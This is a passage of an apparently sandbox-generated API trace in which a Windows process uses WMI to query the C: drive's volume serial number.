Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee190 | out: ppvObject=0x6cee190*=0x0) returned 0x80004002 [0200.057] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0200.057] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x1 [0200.057] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0200.057] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0200.057] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x6ceeab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeab4 | out: ppvObject=0x6ceeab4*=0x67388c0) returned 0x0 [0200.057] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0200.057] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0200.057] WbemDefPath:IWbemPath:SetText (This=0x67388c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6ceec38*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec38*=0x20, pszText=0x0) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6ceec38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6ceebbc | out: puCount=0x6ceebbc*=0x0) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceeba8 | out: puCount=0x6ceeba8*=0x2) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba4*=0xf, pszText=0x0) returned 0x0 [0200.057] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.057] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb58 | out: ppv=0x6ceeb58*=0x72015c) returned 0x0 [0200.057] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb50 | out: pAptType=0x6ceeb50*=1) returned 0x0 [0200.057] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x0) returned 0x80004002 [0200.058] IUnknown:Release (This=0x72015c) returned 0x1 [0200.058] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee4c0 | out: ppv=0x6cee4c0*=0x67370e8) returned 0x0 [0200.058] WbemDefPath:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee6d8 | out: ppvObject=0x6cee6d8*=0x0) returned 0x80004002 [0200.058] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67370e8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee6ec | out: ppvObject=0x6cee6ec*=0x6738700) returned 0x0 [0200.058] WbemDefPath:IUnknown:Release (This=0x67370e8) returned 0x0 [0200.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee30c | out: ppvObject=0x6cee30c*=0x6738700) returned 0x0 [0200.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee2c8 | out: ppvObject=0x6cee2c8*=0x0) returned 0x80004002 [0200.059] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0200.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0200.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedbd4 | out: ppvObject=0x6cedbd4*=0x0) returned 0x80004002 [0200.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedbe0 | out: ppvObject=0x6cedbe0*=0x77c068) returned 0x0 [0200.059] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c068, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedbe8 | out: pCid=0x6cedbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.059] WbemDefPath:IUnknown:Release (This=0x77c068) returned 0x3 [0200.059] CoGetContextToken (in: pToken=0x6cedc40 | out: pToken=0x6cedc40) returned 0x0 [0200.059] CoGetContextToken (in: pToken=0x6cee048 | out: pToken=0x6cee048) returned 0x0 [0200.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee0d8 | out: ppvObject=0x6cee0d8*=0x0) returned 0x80004002 [0200.059] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0200.059] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0200.059] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0200.059] CoGetContextToken (in: pToken=0x6cee930 | out: pToken=0x6cee930) returned 0x0 [0200.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x6ceea00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6cee9fc | out: ppvObject=0x6cee9fc*=0x6738700) returned 0x0 [0200.060] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0200.060] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0200.060] WbemDefPath:IWbemPath:SetText (This=0x6738700, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0200.060] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x6ceeb80 | out: puCount=0x6ceeb80*=0x2) returned 0x0 [0200.060] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6ceeb7c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb7c*=0xf, pszText=0x0) returned 0x0 [0200.060] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6ceeb7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.060] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb80 | out: ppv=0x6ceeb80*=0x72015c) returned 0x0 [0200.060] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb78 | out: pAptType=0x6ceeb78*=1) returned 0x0 [0200.060] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb7c | out: ppvObject=0x6ceeb7c*=0x0) returned 0x80004002 [0200.060] IUnknown:Release (This=0x72015c) returned 0x1 [0200.061] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7a0 | out: ppv=0x6cee7a0*=0x672f1a8) returned 0x0 [0200.061] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee9b8 | out: ppvObject=0x6cee9b8*=0x0) returned 0x80004002 [0200.061] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9cc | out: ppvObject=0x6cee9cc*=0x6736ee8) returned 0x0 [0200.061] WbemLocator:IUnknown:Release (This=0x672f1a8) returned 0x0 [0200.061] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5ec | out: ppvObject=0x6cee5ec*=0x6736ee8) returned 0x0 [0200.061] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5a8 | out: ppvObject=0x6cee5a8*=0x0) returned 0x80004002 [0200.061] WbemLocator:IUnknown:AddRef (This=0x6736ee8) returned 0x3 [0200.061] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0200.061] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedeb4 | out: ppvObject=0x6cedeb4*=0x0) returned 0x80004002 [0200.061] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec0 | out: ppvObject=0x6cedec0*=0x0) returned 0x80004002 [0200.061] CoGetContextToken (in: pToken=0x6cedf20 | out: pToken=0x6cedf20) returned 0x0 [0200.061] CoGetContextToken (in: pToken=0x6cee328 | out: pToken=0x6cee328) returned 0x0 [0200.061] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3b8 | out: ppvObject=0x6cee3b8*=0x0) returned 0x80004002 [0200.062] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x2 [0200.062] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x1 [0200.062] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 [0200.062] CoGetContextToken (in: pToken=0x6cee8f8 | out: pToken=0x6cee8f8) returned 0x0 [0200.062] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x6cee9c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6cee9c4 | out: ppvObject=0x6cee9c4*=0x6736ee8) returned 0x0 [0200.062] WbemLocator:IUnknown:AddRef (This=0x6736ee8) returned 0x3 [0200.062] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x2 [0200.062] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x6ceeb5c | out: puCount=0x6ceeb5c*=0x2) returned 0x0 [0200.062] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x6ceeb58*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb58*=0xf, pszText=0x0) returned 0x0 [0200.062] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x6ceeb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.062] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea34 | out: ppv=0x6ceea34*=0x6736e68) returned 0x0 [0200.062] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e68, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeac8 | out: ppNamespace=0x6ceeac8*=0x67481b4) returned 0x0 [0201.282] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee964 | out: ppvObject=0x6cee964*=0x7819f4) returned 0x0 [0201.282] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7819f4, pProxy=0x67481b4, pAuthnSvc=0x6cee9b4, pAuthzSvc=0x6cee9b0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac, pImpLevel=0x6cee99c, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4 | out: pAuthnSvc=0x6cee9b4*=0xa, pAuthzSvc=0x6cee9b0*=0x0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac*=0x6, pImpLevel=0x6cee99c*=0x2, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4*=0x1) returned 0x0 [0201.282] WbemLocator:IUnknown:Release (This=0x7819f4) returned 0x1 [0201.282] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee958 | out: ppvObject=0x6cee958*=0x781a14) returned 0x0 [0201.282] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee954 | out: ppvObject=0x6cee954*=0x7819f4) returned 0x0 [0201.282] WbemLocator:IClientSecurity:SetBlanket (This=0x7819f4, pProxy=0x67481b4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0201.282] WbemLocator:IUnknown:Release (This=0x7819f4) returned 0x2 [0201.282] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x1 [0201.282] CoTaskMemFree (pv=0x77e118) [0201.282] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x0 [0201.283] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee554 | out: ppvObject=0x6cee554*=0x781a14) returned 0x0 [0201.283] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee510 | out: ppvObject=0x6cee510*=0x0) returned 0x80004002 [0201.285] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee32c | out: ppvObject=0x6cee32c*=0x0) returned 0x80004002 [0201.287] WbemLocator:IUnknown:AddRef (This=0x781a14) returned 0x3 [0201.287] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0201.289] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede1c | out: ppvObject=0x6cede1c*=0x0) returned 0x80004002 [0201.294] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede28 | out: ppvObject=0x6cede28*=0x781974) returned 0x0 [0201.294] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781974, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede30 | out: pCid=0x6cede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.294] WbemLocator:IUnknown:Release (This=0x781974) returned 0x3 [0201.294] CoGetContextToken (in: pToken=0x6cede88 | out: pToken=0x6cede88) returned 0x0 [0201.294] CoGetContextToken (in: pToken=0x6cee290 | out: pToken=0x6cee290) returned 0x0 [0201.294] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee320 | out: ppvObject=0x6cee320*=0x7819fc) returned 0x0 [0201.295] WbemLocator:IRpcOptions:Query (in: This=0x7819fc, pPrx=0x781a14, dwProperty=2, pdwValue=0x6cee348 | out: pdwValue=0x6cee348) returned 0x80004002 [0201.295] WbemLocator:IUnknown:Release (This=0x7819fc) returned 0x3 [0201.295] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x2 [0201.295] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0201.295] CoGetContextToken (in: pToken=0x6cee7c8 | out: pToken=0x6cee7c8) returned 0x0 [0201.295] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x6cee898*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee894 | out: ppvObject=0x6cee894*=0x67481b4) returned 0x0 [0201.295] WbemLocator:IUnknown:AddRef (This=0x67481b4) returned 0x4 [0201.295] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x3 [0201.295] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x2 [0201.295] SysStringLen (param_1=0x0) returned 0x0 [0201.295] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6ceec2c | out: puCount=0x6ceec2c*=0x0) returned 0x0 [0201.295] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6ceec28*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec28*=0x20, pszText=0x0) returned 0x0 [0201.295] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6ceec28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.295] CoGetContextToken (in: pToken=0x6cee898 | out: pToken=0x6cee898) returned 0x0 [0201.295] WbemLocator:IUnknown:AddRef (This=0x781a14) returned 0x3 [0201.295] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee72c | out: ppvObject=0x6cee72c*=0x781a14) returned 0x0 [0201.295] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x3 [0201.295] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x2 [0201.295] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0x20, pszText=0x0) returned 0x0 [0201.295] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6ceec30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.296] IWbemServices:GetObject (in: This=0x67481b4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceebe4*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceebe4*=0x673bf90, ppCallResult=0x0) returned 0x0 [0202.065] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x6ceebe4 | out: puCount=0x6ceebe4*=0x2) returned 0x0 [0202.066] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6ceebe0*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebe0*=0xf, pszText=0x0) returned 0x0 [0202.066] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6ceebe0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebe0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.066] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3535a1c*=0, plFlavor=0x3535a20*=0 | out: pVal=0x6ceebe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3535a1c*=8, plFlavor=0x3535a20*=0) returned 0x0 [0202.066] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.066] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.066] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3535a1c*=8, plFlavor=0x3535a20*=0 | out: pVal=0x6ceebe8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3535a1c*=8, plFlavor=0x3535a20*=0) returned 0x0 [0202.066] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.066] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.066] GetFullPathNameW (in: 